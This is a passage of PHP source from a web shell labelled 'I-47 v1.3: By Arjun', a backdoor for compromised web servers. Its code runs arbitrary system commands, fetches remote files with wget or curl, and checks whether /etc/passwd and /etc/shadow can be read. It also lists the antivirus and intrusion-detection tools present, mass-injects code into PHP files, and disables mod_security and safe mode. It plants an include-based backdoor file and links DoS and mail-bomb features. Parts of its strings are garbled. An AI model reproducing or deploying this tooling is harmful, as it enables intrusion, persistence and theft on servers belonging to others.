 675              @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t))); 
 676              @fclose($w); 
 677         }
 678   }   
 679           
 680   function remotedownload($cmd,$url)
 681   { 
 682       $namafile = basename($url); 
 683       switch($cmd) 
 684       { 
 685           case 'wwget': 
 686               execmd(which('wget')." ".$url." -O ".$namafile);
 687               break; 
 688           case 'wlynx': 
 689               execmd(which('lynx')." -source ".$url." > ".$namafile);
 690               break; 
 691           case 'wfread' : 
 692               execmd($wurl,$namafile);
 693               break; 
 694           case 'wfetch' : 
 695               execmd(which('fetch')." -o ".$namafile." -p ".$url);
 696               break; 
 697           case 'wlinks' : 
 698               execmd(which('links')." -source ".$url." > ".$namafile);
 699               break; 
 700           case 'wget' : 
 701               execmd(which('GET')." ".$url." > ".$namafile);
 702               break; 
 703           case 'wcurl' : 
 704               execmd(which('curl')." ".$url." -o ".$namafile);
 705               break; 
 706           default: 
 707           break; 
 708       } 
 709       return $namafile; 
 710   }
 711   
 712   function magicboom($text)
 713   { 
 714       if (!get_magic_quotes_gpc()) 
 715           return $text; 
 716       return stripslashes($text); 
 717   }
 718   
 719   function checkproxyhost()
 720   {
 721       $host = getenv("HTTP_HOST");
 722       $filename = ' / tmp / . setan / xh';
 723       if (file_exists($filename)) 
 724       {
 725           $_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won'tbeabletoconnecttothisproxy . < / br > < / br > < / center > ";
 726           } else {
 727           $_POST['proxyhostmsg']=" < / br > < / br > < center > < fontcolor = redsize = 4 > < b > Failed! < / b > < / font > < / br > < / br > < fontcolor = redsize = 3 > Note : < / b > If for somereasonwewouldnotcreate and extracttheneedproxyfilesin'/tmp'thiswillmakethisfail . < / font > < / br > < / br > < / center > ";
 728        } 
 729 }
 730 
 731 
 732 ###
 733 ###
 734 ###
 735 ###
 736 ###
 737 ###
 738 ###
 739 ###
 740 ###
 741 ###
 742 ###
 743 ###
 744 ###
 745 ###
 746 ###
 747 ###
 748 ###
 749 function execmd($cmd,$d_functions="None")
 750 {
 751     if($d_functions=="None") 
 752   {
 753       $ret=passthru($cmd); 
 754       return $ret;
 755   }
 756     $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
 757     $d_functions=str_replace("","",$d_functions);
 758     $dis_funcs=explode(", ",$d_functions);
 759     foreach($funcs as $safe)
 760     {
 761         if(!in_array($safe,$dis_funcs)) 
 762         {
 763             if($safe=="exec")
 764             {
 765                 $ret=@exec($cmd);
 766                 $ret=join("",$ret);
 767                 return $ret;
 768             }
 769             elseif($safe=="system")
 770             {
 771                 $ret=@system($cmd);
 772                 return $ret;
 773             }
 774             elseif($safe=="passthru")
 775             {
 776                 $ret=@passthru($cmd);
 777                 return $ret;
 778             }
 779             elseif($safe=="shell_exec")
 780             {
 781                 $ret=@shell_exec($cmd);
 782                 return $ret;
 783             }
 784             elseif($safe=="popen")
 785             {
 786                 $ret=@popen("$cmd",'r');
 787                 if(is_resource($ret))
 788                 {
 789                     while(@!feof($ret))
 790                     $read.=@fgets($ret);
 791                     @pclose($ret);
 792                     return $read;
 793                 }
 794                 return -1;
 795             }
 796             elseif($safe="proc_open")
 797             {
 798                 $cmdpipe=array(
 799                 0=>array('pipe','r'),
 800                 1=>array('pipe','w')
 801                 );
 802                 $resource=@proc_open($cmd,$cmdpipe,$pipes);
 803                 if(@is_resource($resource))
 804                 {
 805                     while(@!feof($pipes[1]))
 806                     $ret.=@fgets($pipes[1]);
 807                     @fclose($pipes[1]);
 808                     @proc_close($resource);
 809                     return $ret;
 810                 }
 811                 return -1;
 812             }
 813         }
 814     }
 815     return -1;
 816 }
 817 
 818   function getDisabledFunctions()
 819   {
 820       if(!ini_get('disable_functions'))
 821       {
 822           return "None";
 823       }
 824       else
 825       {
 826               return @ini_get('disable_functions');
 827       }
 828   }
 829   
 830   function getFilePermissions($file)
 831 {
 832     
 833 $perms = fileperms($file);
 834 
 835 if (($perms & 0xC000) == 0xC000) {
 836     // Socket
 837     $info = 's';
 838 } elseif (($perms & 0xA000) == 0xA000) {
 839     // Symbolic Link
 840     $info = 'l';
 841 } elseif (($perms & 0x8000) == 0x8000) {
 842     // Regular
 843     $info = '-';
 844 } elseif (($perms & 0x6000) == 0x6000) {
 845     // Block special
 846     $info = 'b';
 847 } elseif (($perms & 0x4000) == 0x4000) {
 848     // Directory
 849     $info = 'd';
 850 } elseif (($perms & 0x2000) == 0x2000) {
 851     // Character special
 852     $info = 'c';
 853 } elseif (($perms & 0x1000) == 0x1000) {
 854     // FIFO pipe
 855     $info = 'p';
 856 } else {
 857     // Unknown
 858     $info = 'u';
 859 }
 860 
 861 // Owner
 862 $info .= (($perms & 0x0100) ? 'r' : '-');
 863 $info .= (($perms & 0x0080) ? 'w' : '-');
 864 $info .= (($perms & 0x0040) ?
 865             (($perms & 0x0800) ? 's' : 'x' ) :
 866             (($perms & 0x0800) ? 'S' : '-'));
 867 
 868 // Group
 869 $info .= (($perms & 0x0020) ? 'r' : '-');
 870 $info .= (($perms & 0x0010) ? 'w' : '-');
 871 $info .= (($perms & 0x0008) ?
 872             (($perms & 0x0400) ? 's' : 'x' ) :
 873             (($perms & 0x0400) ? 'S' : '-'));
 874 
 875 // World
 876 $info .= (($perms & 0x0004) ? 'r' : '-');
 877 $info .= (($perms & 0x0002) ? 'w' : '-');
 878 $info .= (($perms & 0x0001) ?
 879             (($perms & 0x0200) ? 't' : 'x' ) :
 880             (($perms & 0x0200) ? 'T' : '-'));
 881 
 882 return $info;
 883 
 884 }
 885   
 886 
 887   function yourip()
 888   {
 889       echo $_SERVER["REMOTE_ADDR"];
 890   }
 891   function odi()
 892   {
 893       $od = @ini_get("open_basedir");
 894       echo $od;
 895   }
 896   function phpver()
 897   {
 898       $pv=@phpversion();
 899       echo $pv;
 900   }
 901   function serverip()
 902   {
 903       echo getenv('SERVER_ADDR');
 904   }
 905   function serverport()
 906   {
 907       echo $_SERVER['SERVER_PORT'];
 908   }
 909   function cip()
 910   {
 911       echo $_SERVER["SERVER_NAME"];
 912   }
 913   function  safe()
 914   {
 915       global $sm;
 916       return $sm?"ON : ( : '( (Most of the Features will Not Work!)":"OFF";
 917   }
 918   function browse()
 919   {
 920       $brow= $_SERVER["HTTP_USER_AGENT"];
 921       print($brow);
 922   }
 923   function serveradmin()
 924   {
 925       echo $_SERVER['SERVER_ADMIN'];
 926   }
 927   function mysq()
 928   {
 929       echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");
 930   }
 931   function systeminfo()
 932   {
 933       echo php_uname();
 934   }
 935   function curlinfo()
 936   {
 937       echo function_exists('curl_version')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 938   }
 939   function oracleinfo()
 940   {
 941       echo function_exists('ocilogon')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 942   }
 943   function mysqlinfo()
 944   {
 945       echo function_exists('mysql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 946   }
 947   function mssqlinfo()
 948   {
 949       echo function_exists('mssql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 950   }
 951   function postgresqlinfo()
 952   {
 953       echo function_exists('pg_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 954   }
 955   function softwareinfo()
 956   {
 957       echo getenv("SERVER_SOFTWARE");
 958   }
 959   function download()
 960   {
 961       $frd=$_GET['download'];
 962       $prd=explode("/",$frd);
 963       for($i=0;$i<sizeof($prd);$i++)
 964       {
 965           $nfd=$prd[$i];
 966       }
 967       @ob_clean(); 
 968      header("Content-type: application/octet-stream"); 
 969      header("Content-length: ".filesize($nfd)); 
 970      header("Content-disposition: attachment; filename=\"".$nfd."\";"); 
 971          readfile($nfd);
 972 
 973          exit;
 974   
 975   }
 976       
 977   function HumanReadableFilesize($size)
 978     {
 979  
 980         $mod = 1024;
 981  
 982         $units = explode('','BKBMBGBTBPB');
 983         for ($i = 0; $size > $mod; $i++) 
 984         {
 985             $size /= $mod;
 986         }
 987  
 988         return round($size, 2) . '' . $units[$i];
 989     }
 990   
 991   function showDrives()
 992     {
 993         global $self;
 994         foreach(range('A','Z') as $drive)
 995         {
 996             if(is_dir($drive.':
 997                     \'))
 998             {
 999                 ?>
1000                 <a class="dir" href=' < ? phpecho $self ?>?dir=<?php echo $drive . ":\"; ?>'>
1001                     <?php echo $drive." : \" ?>
1002                 </a> 
1003                 <?php
1004             }
1005         }
1006     }
1007   function diskSpace()
1008   {
1009       echo HumanReadableFilesize(disk_total_space(" / "));
1010   }   
1011   function freeSpace()
1012   {
1013      echo HumanReadableFilesize(disk_free_space(" / "));
1014   }
1015   
1016   function thiscmd($p) 
1017   {
1018       $path = myexe('which ' . $p);
1019       if(!empty($path))
1020           return $path;
1021       return false;
1022   }
1023 
1024   function split_dir()
1025   {
1026       $de=explode(" / ",getcwd());
1027       $del=$de[0];
1028       for($count=0;$count<sizeof($de);$count++)
1029       {
1030       $imp=$imp.$de[$count].'/';
1031           
1032       echo " < ahref = ".$self." ? open = ".$imp." > ".$de[$count]." < / a > / ";
1033       }
1034       
1035   }
1036   
1037   function mysecinfo()
1038   {
1039       
1040       function myparam($n, $v) 
1041       {
1042           $v = trim($v);
1043           if($v) 
1044           {
1045               echo '<span><font color =red size=3>' . $n . ': </font></span>';
1046               if(strpos($v, "") === false)
1047                   echo '<font color =lime size=3>' . $v . '</font><br>';
1048               else
1049                   echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
1050           }
1051       }
1052   
1053       myparam('Server software', @getenv('SERVER_SOFTWARE'));
1054       if(function_exists('apache_get_modules'))
1055           myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1056       myparam('Open base dir', @ini_get('open_basedir'));
1057       myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1058       myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1059       $temp=array();
1060       if(function_exists('mysql_get_client_info'))
1061           $temp[] = "MySql(".mysql_get_client_info().") ";
1062       if(function_exists('mssql_connect'))
1063           $temp[] = "MSSQL";
1064       if(function_exists('pg_connect'))
1065           $temp[] = "PostgreSQL";
1066       if(function_exists('oci_connect'))
1067           $temp[] = "Oracle";
1068       myparam('Supported databases', implode(', ', $temp));
1069       echo '<br>';
1070   
1071       if($GLOBALS['os'] == 'Linux') {
1072               myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes < ahref = '$self?passwd' > [view] < / a > ":'no');
1073               myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes < ahref = '#'onclick = 'g(\"FilesTools\", \"/etc/\", \"shadow\")' > [view] < / a > ":'no');
1074               myparam('OS version', @file_get_contents('/proc/version'));
1075               myparam('Distr name', @file_get_contents('/etc/issue.net'));
1076               myparam('Where is Perl?', myexe('whereis perl'));
1077               myparam('Where is Python?', myexe('whereis python'));
1078               myparam('Where is gcc?', myexe('whereis gcc'));
1079               myparam('Where is apache?', myexe('whereis apache'));
1080               myparam('CPU?', myexe('cat /proc/cpuinfo'));
1081               myparam('RAM', myexe('free -m'));
1082               myparam('Mount options', myexe('cat /etc/fstab'));
1083               myparam('User Limits', myexe('ulimit -a'));
1084               
1085               
1086               if(!$GLOBALS['safe_mode']) {
1087                   $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1088                   $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1089                   $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1090                   echo '<br>';
1091                   $temp=array();
1092                   foreach ($userful as $item)
1093                       if(thiscmd($item))
1094                           $temp[] = $item;
1095                   myparam('Userful', implode(', ',$temp));
1096                   $temp=array();
1097                   foreach ($danger as $item)
1098                       if(thiscmd($item))
1099                           $temp[] = $item;
1100                   myparam('Danger', implode(', ',$temp));
1101                   $temp=array();
1102                   foreach ($downloaders as $item)
1103                       if(thiscmd($item))
1104                           $temp[] = $item;
1105                   myparam('Downloaders', implode(', ',$temp));
1106                   echo '<br/>';
1107                   myparam('HDD space', myexe('df -h'));
1108                   myparam('Hosts', @file_get_contents('/etc/hosts'));
1109                   
1110               }
1111       } else {
1112           echo " < fontcolor = redsize = 3 > PasswordFile : < / font > < ahref = ".$_SERVER['PHP_SELF']." ? download = " . $_SERVER["WINDIR"]."epair\sam > < b > < fontcolor = limesize = 3 > Downloadpasswordfile < / font > < / b > < / a > < br > ";
1113           echo " < fontcolor = redsize = 3 > ConfigFiles : < / font > < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etc\hosts > < b > < fontcolor = limesize = 3 > [Hosts] < / font > < / b > < / a > & nbsp; < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etcetworks > < b > < fontcolor = limesize = 3 > [LocalNetworkMap] < / font > < / b > < / a > & nbsp; < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts . sam > < b > < fontcolor = limesize = 3 > [lmhosts] < / font > < / b > < / a > < br > ";
1114           $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1115           echo " < fontcolor = redsize = 3 > OpenBaseDir : < / font > < fontcolor = limesize = 3 > " . $base . " < / font > < br > ";
1116           myparam('OS Version',myexe('ver'));
1117           myparam('Account Settings',myexe('net accounts'));
1118           myparam('User Accounts',myexe('net user'));
1119       }
1120       echo '</div>';
1121   }
1122   
1123   
1124   
1125   function myexe($in) {
1126   $out = '';
1127   if (function_exists('exec')) {
1128       @exec($in,$out);
1129       $out = @join("",$out);
1130   } elseif (function_exists('passthru')) {
1131       ob_start();
1132       @passthru($in);
1133       $out = ob_get_clean();
1134   } elseif (function_exists('system')) {
1135       ob_start();
1136       @system($in);
1137       $out = ob_get_clean();
1138   } elseif (function_exists('shell_exec')) {
1139       $out = shell_exec($in);
1140   } elseif (is_resource($f = @popen($in,"r"))) {
1141       $out = "";
1142       while(!@feof($f))
1143           $out .= fread($f,1024);
1144       pclose($f);
1145   }
1146   return $out;
1147 }
1148   
1149   function exec_all($command)
1150 {
1151     
1152     $output = '';
1153     if(function_exists('exec'))
1154     {   
1155         exec($command,$output);
1156         $output = join("",$output);
1157     }
1158     
1159     else if(function_exists('shell_exec'))
1160     {
1161         $output = shell_exec($command);
1162     }
1163     
1164     else if(function_exists('popen'))
1165     {
1166         $handle = popen($command , "r"); // Open the command pipe for reading
1167         if(is_resource($handle))
1168         {
1169             if(function_exists('fread') && function_exists('feof'))
1170             {
1171                 while(!feof($handle))
1172                 {
1173                     $output .= fread($handle, 512);
1174                 }
1175             }
1176             else if(function_exists('fgets') && function_exists('feof'))
1177             {
1178                 while(!feof($handle))
1179                 {
1180                     $output .= fgets($handle,512);
1181                 }
1182             }
1183         }
1184         pclose($handle);
1185     }
1186     
1187     
1188     else if(function_exists('system'))
1189     {
1190         ob_start(); //start output buffering
1191         system($command);
1192         $output = ob_get_contents();    // Get the ouput 
1193         ob_end_clean();                 // Stop output buffering
1194     }
1195     
1196     else if(function_exists('passthru'))
1197     {
1198         ob_start(); //start output buffering
1199         passthru($command);
1200         $output = ob_get_contents();    // Get the ouput 
1201         ob_end_clean();                 // Stop output buffering            
1202     }
1203     
1204     else if(function_exists('proc_open'))
1205     {
1206         $descriptorspec = array(
1207                 1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
1208                 );
1209         $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1210         if(is_resource($handle))
1211         {
1212             if(function_exists('fread') && function_exists('feof'))
1213             {
1214                 while(!feof($pipes[1]))
1215                 {
1216                     $output .= fread($pipes[1], 512);
1217                 }
1218             }
1219             else if(function_exists('fgets') && function_exists('feof'))
1220             {
1221                 while(!feof($pipes[1]))
1222                 {
1223                     $output .= fgets($pipes[1],512);
1224                 }
1225             }
1226         }
1227         pclose($handle);
1228     }
1229     
1230     return(htmlspecialchars($output));
1231     
1232 }
1233 
1234 
1235 ?>
1236 
1237 <?php
1238 
1239 
1240 $pinfo = "info"; 
1241 if(isset($_GET["com"]))
1242 {
1243   phpinfo();
1244 }
1245 else
1246 {
1247 $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?" < fontcolor = 'lime' > ON < / font > ":" < fontcolor = 'red' > OFF < / font > ";
1248 $etc_passwd=@is_readable(" / etc / passwd")?"Yes":"No";
1249 ?>
1250 <div align="center">
1251 <a href=" < ? php $_SERVER['PHP_SELF']; ?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">I-47 v1.3: By Arjun </font></a>
1252 
1253 </div>
1254 <hr>
1255    
1256 <table cellpadding="0" style="width:100%;">
1257    <tr>
1258        <td colspan="3" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
1259        <td style="width:15%;"><a href="<?php $_SERVER['PHP_SELF']; ?>?com=info" target="_blank"><font class="txt"><i>Software Info</i></font></a></td>
1260    </tr>
1261    <tr>
1262        <td style="width:85%;" colspan="3">Software : <font class="txt"><?php softwareinfo(); ?></font></td>
1263        <td style="width:15%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
1264    </tr>
1265    
1266    <?php if ($os != 'Windows' || shell_exec("id") != null) { ?><tr>
1267        <td style="width:75%;" colspan="3">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
1268    </tr><?php
1269                     } ?>
1270    <tr>
1271        <td style="width:20%;">Disk Space : <font class="txt"><?php diskSpace(); ?></font></td>
1272        <td style="width:20%;">Free Space : <font class="txt"><?php freeSpace(); ?></font></td>
1273        
1274        <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
1275        <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
1276    </tr>
1277    
1278    <tr>
1279        <?php if ($os == 'Windows') { ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives(); ?></font></td><?php
1280                     } ?>
1281        <?php if ($os != 'Windows') { ?><td colspan=2 style="width:20%;">Current Directory : <font color="#009900"><?php
1282                         $d = str_replace("\",$directorysperator,$dir);
1283   if (substr($d,-1) != $directorysperator) {$d.= $directorysperator;
1284                         }
1285   $d = str_replace("\","\",$d);
1286   $dispd = htmlspecialchars($d);
1287   $pd = $e = explode($directorysperator,substr($d,0,-1));
1288   $i = 0;
1289   foreach($pd as $b)
1290   {
1291    $t = '';
1292    $j = 0;
1293    foreach ($e as $r)
1294    {
1295     $t.= $r.$directorysperator;
1296     if ($j == $i) {break;}
1297     $j++;
1298    }
1299   
1300   
1301   $href='dir='.$t;
1302   
1303    echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.' < / font > < / b > < / a > ';
1304    $i++;
1305   }
1306 
1307       ?></font></td><?php } ?>
1308       <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
1309       <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
1310       
1311   </tr>
1312   </table>
1313   
1314 
1315 <table border="3" width="100%;" cellpadding="2">
1316   <tr>
1317       <td style="border:none;"><a href="<?php echo $self.' ? symlinkserver'?>"><font color="#FF0000">Symlink</font></a></td>
1318       <td style="border:none;"><a href="<?php echo $self.' ? forum'?>"><font color="#FF0000">Forum</font></a></td>
1319       <td style="border:none;"><a href="<?php echo $self.' ? secinfo'?>"><font color="#FF0000">Sec. Info</font></a></td>
1320       <td style="border:none;"><a href="<?php echo $self.' ? injector'?>"><font color="#FF0000">Code Inject</font></a></td>
1321       <td style="border:none;"><a href="<?php echo $self.' ? bypass';?>"><font color="#FF0000">Bypassers</font></a></td>
1322       <td style="border:none;"><a href="<?php echo $self.' ? fuzz'?>"><font color="#FF0000">Server Fuzzer</font></a></td>
1323       <td style="border:none;"><a href="<?php echo $self.' ? zone'?>"><font color="#FF0000">Zone-h</font></a></td>
1324       <td style="border:none;"><a href="<?php echo $self.' ? phpproxy'?>"><font color="#FF0000">Proxy</font></a></td>
1325       <td style="border:none;"><a href="<?php echo $self.' ? dos';?>"><font color="#FF0000">DoS</font></a></td>
1326       <td style="border:none;"><a href="<?php echo $self.' ? mailbomb'?>"><font color="#FF0000">Mail</font></a></td>
1327       <td style="border:none;"><a href="<?php echo $self.' ? tools'?>"><font color="#FF0000">Tools</font></a></td>
1328       <td style="border:none;"><a href="<?php echo $self.' ? phpc';?>"><font color="#FF0000">PHP</font></a></td>
1329       <td style="border:none;"><a href="<?php echo $self.' ? exploit'?>"><font color="#FF0000">Exploit</font></a></td>
1330       <td style="border:none;"><a href="<?php echo $self.' ? connect'?>"><font color="#FF0000">Connect</font></a></td>
1331       <td style="border:none;"><a href="<?php echo $self.' ? database'?>"><font color="#FF0000">SQL</font></a></td>
1332       <td style="border:none;"><a href="<?php echo $self.' ? about'?>"><font color="#FF0000">About</font></a></td>
1333       <td style="border:none;"><a href="<?php echo $self.' ? selfkill'?>" onClick="if(confirm('AreYouSureYouWantToKillThisShell ? ')){return true;}else{return false;}"><font color="#FF0000">SelfKill</font></a></td>
1334       <td style="border:none;"><a href="<?php echo $self.' ? logout'?>"><font color="#FF0000">LogOut</font></a></td>
1335   </tr>
1336 </table>
1337 
1338 
1339 <table align="center" style="width:95%; background-color:#0C0C0C; -moz-border-radius:25px;"><br>
1340     <tr>
1341         <form method="GET"  action="<?php echo $self; ?>">
1342         <td style="width:35%;" align="right"> &nbsp;Present Working Directory : </td><td style="width:20%;"><input name="dir" class="box" style="width:300px;" value="<?php if($dir == null){echo getcwd();} else { echo $dir; } ?>"/></td>
1343         <td><input type="submit" value="  Go  " class="but" /></td><td align="right"><?php if($os == "Linux") { ?>
1344       <a href="<?php echo $self.' ? downloadit'; ?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
1345         </form>
1346     </tr>
1347 </table>
1348 
1349 <?php
1350 
1351 if(isset($_POST['pathtomass']) &&  $_POST['pathtomass'] != '' &&  isset($_POST['filetype']) &&  $_POST['filetype'] != '' &&  isset($_POST['mode']) &&  $_POST['mode'] != '' && isset($_POST['injectthis']) &&  $_POST['injectthis'] != '')
1352     {
1353         //$dir = $_GET['dir'];
1354         $filetype = $_POST['filetype'];
1355         //$message = $_GET['message'];
1356         
1357         $mode = "a"; //default mode
1358         
1359         
1360         // Modes Begin
1361         
1362         if($_POST['mode'] == 'Apender')
1363         {
1364             $mode = "a";
1365         }
1366         if($_POST['mode'] == 'Overwriter')
1367         {
1368             $mode = "w";
1369         }
1370         
1371         if ($_POST['filetype'] == 'php') 
1372       {
1373           if (is_dir($_POST['pathtomass'])) 
1374           {
1375               $lolinject = $_POST['injectthis'];
1376               foreach (glob($_POST['pathtomass'] . $directorysperator . "*.php") as $injectj00) 
1377               {
1378                   $fp=fopen($injectj00,$mode);
1379                   if (fputs($fp,$lolinject)){
1380                       echo ' < br > < fontcolor = limesize = 3 > '.$injectj00.'wasinjected < br > < / font > ';
1381               } else {
1382                       echo ' < fontcolor = redsize = 3 > failedtoinject'.$injectj00.' < / font > ';
1383               }
1384           }
1385       } else 
1386           { //end if inputted dir is real -- if not, show an ugly red error
1387           echo ' < b > < fontcolor = red > '.$_POST['pathtomass'].'isnotavailable! < / font > < / b > ';
1388           } // end if inputted dir is real, for real this time
1389       } // end if confirmation to mass sploit is php only
1390   } // end if massbrowsersploit is called
1391 
1392 
1393 
1394 if(isset($_GET['to']) && isset($_GET['file']))
1395 {
1396      if(!rename($_GET['file'], $_GET['to']))
1397      {
1398       $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1399       header("Location:$loc");
1400       ob_end_flush();
1401        
1402      }
1403      else
1404      {
1405       $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1406       header("Location:$loc");
1407       ob_end_flush();
1408         
1409      }
1410 }
1411 
1412   
1413   if(isset($_POST["changeperms"]))
1414   {
1415       if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
1416       {
1417           $perms = 0; 
1418             for($i=strlen($_POST['chmode'])-1;$i>=0;--$i) 
1419                 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); 
1420           if(@chmod($_POST['myfilename'],$perms))
1421               echo "<center><blink><font size=3 color=lime>File Permissions Changed Successfully</font></blink></center>";
1422           else
1423               echo "<center><blink><font size=3 color=red>Cannot Change File Permissions</font></blink></center>";
1424       }
1425   }
1426   
1427 $setuploadvalue = 0;
1428 if(isset($_POST['u']))
1429   {
1430       $path = $_REQUEST['path'];
1431       if(is_dir($path))
1432         {
1433             $uploadedFilePath = $_FILES['uploadfile']['name'];
1434           //echo $uploadedFilePath;
1435             $tempName = $_FILES['uploadfile']['tmp_name'];
1436           //echo $tempName;
1437           if($os == "Windows")
1438               $uploadPath = $path . $directorysperator .  $uploadedFilePath;
1439           else if($os == "Linux")
1440                $uploadPath = $path . $directorysperator . $uploadedFilePath;
1441           if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
1442             {
1443                echo "<center><font color=lime size=3><blink>File uploaded to $uploadPath</blink></font></center>";  
1444              //header("Location:");         
1445             }
1446             else
1447             {
1448                 echo "<center><font color=red size=3><blink>Failed to upload file to $uploadPath</blink></font></center>";
1449             }
1450          }
1451   }
1452       
1453   if(isset($_POST['createdir']))
1454   {
1455       if(!mkdir($_POST['createfolder']))
1456           echo "Failed To create";
1457   }
1458 if(isset($_POST['createmyfile'])&&isset($_POST['filecontent']))
1459 {
1460   $content = $_POST['filecontent'];
1461   $file_pointer = fopen($_POST['filecreator'], "w+");
1462   fwrite($file_pointer, $content); 
1463   fclose($file_pointer);
1464   $loc = $_SERVER['REQUEST_URI'];
1465   header("Location:$loc");
1466   ob_end_flush();
1467 }
1468 
1469 
1470 //Turn Safe Mode Off
1471 
1472   if(getDisabledFunctions() != "None" || safe() != "OFF")
1473   {
1474       $file_pointer = fopen(".htaccess", "w+");
1475       fwrite($file_pointer, "<IfModule mod_security.c>
1476                   SecFilterEngine Off
1477                        SecFilterScanPOST Off
1478                   </IfModule>"); 
1479           
1480       $file_pointer = fopen("ini.php", "w+");
1481       fwrite($file_pointer, "<?
1482 echo ini_get(\"safe_mode\");
1483 echo ini_get(\"open_basedir\");
1484 include(\$_GET[\"file\"]);
1485 ini_restore(\"safe_mode\");
1486 ini_restore(\"open_basedir\");
1487 echo ini_get(\"safe_mode\");
1488 echo ini_get(\"open_basedir\");
1489 include(\$_GET[\"ss\"]);
1490 ?>"); 
1491 
1492       $file_pointer = fopen("php.ini", "w+");
1493       fwrite($file_pointer, "safe_mode               =       Off"); 
1494                   
1495       fclose($file_pointer); 
1496       //echo "Safe Mode Is Now Off..";
1497     }
1498   
1499   if(isset($_GET["downloadit"]))
1500   {
1501       $FolderToCompress = getcwd(); 
1502       execmd("tar --create --recursion --file=backup.tar $FolderToCompress"); 
1503       
1504       $prd=explode("/","backup.tar");
1505       for($i=0;$i<sizeof($prd);$i++)
1506       {
1507           $nfd=$prd[$i];
1508       }
1509       @ob_clean(); 
1510      header("Content-type: application/octet-stream"); 
1511      header("Content-length: ".filesize($nfd)); 
1512      header("Content-disposition: attachment; filename=\"".$nfd."\";"); 
1513          readfile($nfd);
1514 
1515          exit;
1516   }
1517   
1518   ?>
1519   <a href="javascript:history.back(1)"><font color=lime size="3"> [Back] </font></a>&nbsp;
1520   <a href="javascript:history.go(1)"><font color=lime size="3"> [Forward] </font></a>&nbsp;
1521   <a href=""><font color=lime size="3"> [Refresh] </font></a>&nbsp;
1522   <?php 
1523   
1524   if(isset($_POST['uploadurl']))
1525   { 
1526       $functiontype = trim($_POST['functiontype']); 
1527       $wurl = trim($_POST['wurl']); 
1528       $path = magicboom($_POST['path']); 
1529       $namafile = remotedownload($functiontype,$wurl); 
1530       $fullpath = $path . $directorysperator . $namafile; 
1531       if(is_file($fullpath)) 
1532       { 
1533           echo "<center><font color=lime size=3>File uploaded to $fullpath</font></center>"; 
1534       } 
1535       else 
1536           echo "<center><font color=red size=3>Failed to upload $namafile</font></center>"; 
1537   }
1538   
1539   // Install Php Proxy
1540   if (isset($_GET["phpproxy"]))
1541   {
1542       ?><br><center><table cellpadding="5" border="1" style="width:60%;">
1543       <tr><td colspan="2" align="center">
1544       <font color="#FF0000" size="4">Install PHP Based Proxy</font></td></tr><tr><td style="height:60px;" align="right">
1545       <form action=<?php echo $self; ?> method=GET>
1546       <input type=hidden name="act" value="phpproxy">
1547       <input type=hidden name="install" value="yup">
1548       <font color="#FF0000" size="3">Path to install in:</td><td><input type=text class="box" name="path" value="<?php echo $dir; ?>"> (must have final /)</td></font></tr><tr><td colspan="2" align="center" style="height:40px;">
1549       <input type=submit value="Install" class="but"></form></td></tr></table></center><br>
1550   <?php } 
1551   else if(isset($_GET['install'])) 
1552   {
1553       if (is_writable($_GET['path'])) 
1554       {
1555           @$fh=fopen($_GET['path'].'proxy . php','w');
1556           @fwrite($fh,gzinflate(base64_decode($phpproxy)));
1557           @fclose($fh);
1558           
